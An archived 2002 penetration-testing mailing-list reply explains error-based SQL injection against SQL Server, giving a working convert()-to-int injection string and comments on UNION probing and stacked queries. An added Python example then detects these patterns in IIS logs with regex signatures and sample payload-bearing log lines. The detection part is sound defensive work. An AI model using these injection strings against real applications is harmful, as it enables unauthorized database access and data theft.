Penetration Testing mailing list archives

Re: sql injection - operand type clash


From: "Kevin Spett" <kspett () spidynamics com>
Date: Fri, 15 Mar 2002 14:45:04 -0800

> Microsoft OLE DB Provider for ODBC Drivers (0x80040E07)
> [Microsoft][ODBC SQL Server Driver][SQL Server]Operand type clash: ntext is
> incompatible with int
>
> I have tried
>
> union select username,1,1,.... (20+ columns) from table
> union select 1,username,1,1....
> union select 1,1,username,1...

Yeah, that can eat up some time.
Try using the convert() hack to get the result of your query back in an
error message.  Assuming that you're dealing with a quoted vulnerability try
this injection string:
' %2b convert(int, (SELECT TOP 1 fieldname FROM table WHERE fieldname NOT IN
('knownvalue', 'knownvalue2'))) %2b '

You should get a convert error back that includes the result of the
subquery.

> I've also tried union select convert(sql_variant,username),1,1,...

I think sql_variant only works in the most recent version of SQL Server, so
it may not even be a recognized data type

> My second problem is that I cannot execute this:
> http://target/da.asp?userid=user' or 1=1; select * from
> information_schema.tables--

You're not likely to get the results of a stacked query in your returned
page.  Stacking queries is mostly useful for executing stored procedures.


Good luck.

Kevin Spett
SPI Dynamics, Inc.
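The injection patterns discussed in this thread (UNION column probing, the convert()-to-int error trick, tautologies and stacked queries against information_schema) leave distinctive traces in web server logs. Below is an added detection example, written for this archive page and not part of Kevin's reply or the original poster's message; the IIS W3C log lines are constructed samples modelled on the requests above, and the field layout is assumed to be date, time, client IP, method, URI stem, URI query, status.

```python
import html
import re
from urllib.parse import unquote_plus

# Signatures for the techniques discussed in the thread. Matching is done on
# the decoded query so %2b / %20 / &apos; encodings do not hide the SQL.
SIGNATURES = {
    "union_select": re.compile(r"\bunion\s+(all\s+)?select\b", re.I),
    "convert_error": re.compile(r"\bconvert\s*\(\s*(int|sql_variant)\s*,", re.I),
    "stacked_query": re.compile(r";\s*(select|exec|insert|update|delete|drop)\b", re.I),
    "schema_enum": re.compile(r"\binformation_schema\.", re.I),
    "tautology": re.compile(r"'\s*or\s+1\s*=\s*1", re.I),
}

def normalize(query_string):
    """URL-decode (%2b -> +, %20 -> space), unescape HTML entities (&apos;),
    and collapse whitespace so the signatures see what SQL Server would see."""
    text = html.unescape(unquote_plus(query_string))
    return re.sub(r"\s+", " ", text)

def flag_injection(query_string):
    """Return the names of every signature that matches the normalized query."""
    text = normalize(query_string)
    return [name for name, rx in SIGNATURES.items() if rx.search(text)]

def scan_log(lines):
    """Parse IIS W3C-style lines (date time c-ip method uri-stem uri-query status)
    and return (uri-stem, hits) for each request that trips a signature."""
    findings = []
    for line in lines:
        if not line or line.startswith("#"):  # skip directives and blanks
            continue
        fields = line.split(" ")
        if len(fields) < 7:  # assumed field layout; malformed lines are ignored
            continue
        stem, query = fields[4], fields[5]
        hits = flag_injection(query)
        if hits:
            findings.append((stem, hits))
    return findings

# Constructed sample log lines; the requests mirror those quoted in the thread.
SAMPLE_LOG = [
    "#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status",
    "2002-03-15 14:40:01 10.0.0.5 GET /da.asp userid=user 200",
    "2002-03-15 14:41:12 10.0.0.5 GET /da.asp userid=user'%20union%20select%20username,1,1%20from%20users-- 500",
    "2002-03-15 14:42:30 10.0.0.5 GET /da.asp userid=user'%20%2b%20convert(int,(SELECT%20TOP%201%20name%20FROM%20t))%20%2b%20' 500",
    "2002-03-15 14:43:05 10.0.0.5 GET /da.asp userid=user&apos;%20or%201=1;%20select%20*%20from%20information_schema.tables-- 200",
]
```

Note that the convert() request in the sample returns a 500, as the thread predicts: an ODBC error page carrying the subquery result is itself a strong signal, so alerting on 5xx responses to pages that normally return 200 complements the signature match.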


----------------------------------------------------------------------------
This list is provided by the SecurityFocus Security Intelligence Alert (SIA)
Service. For more information on SecurityFocus' SIA service which
automatically alerts you to the latest security vulnerabilities please see:
https://alerts.securityfocus.com/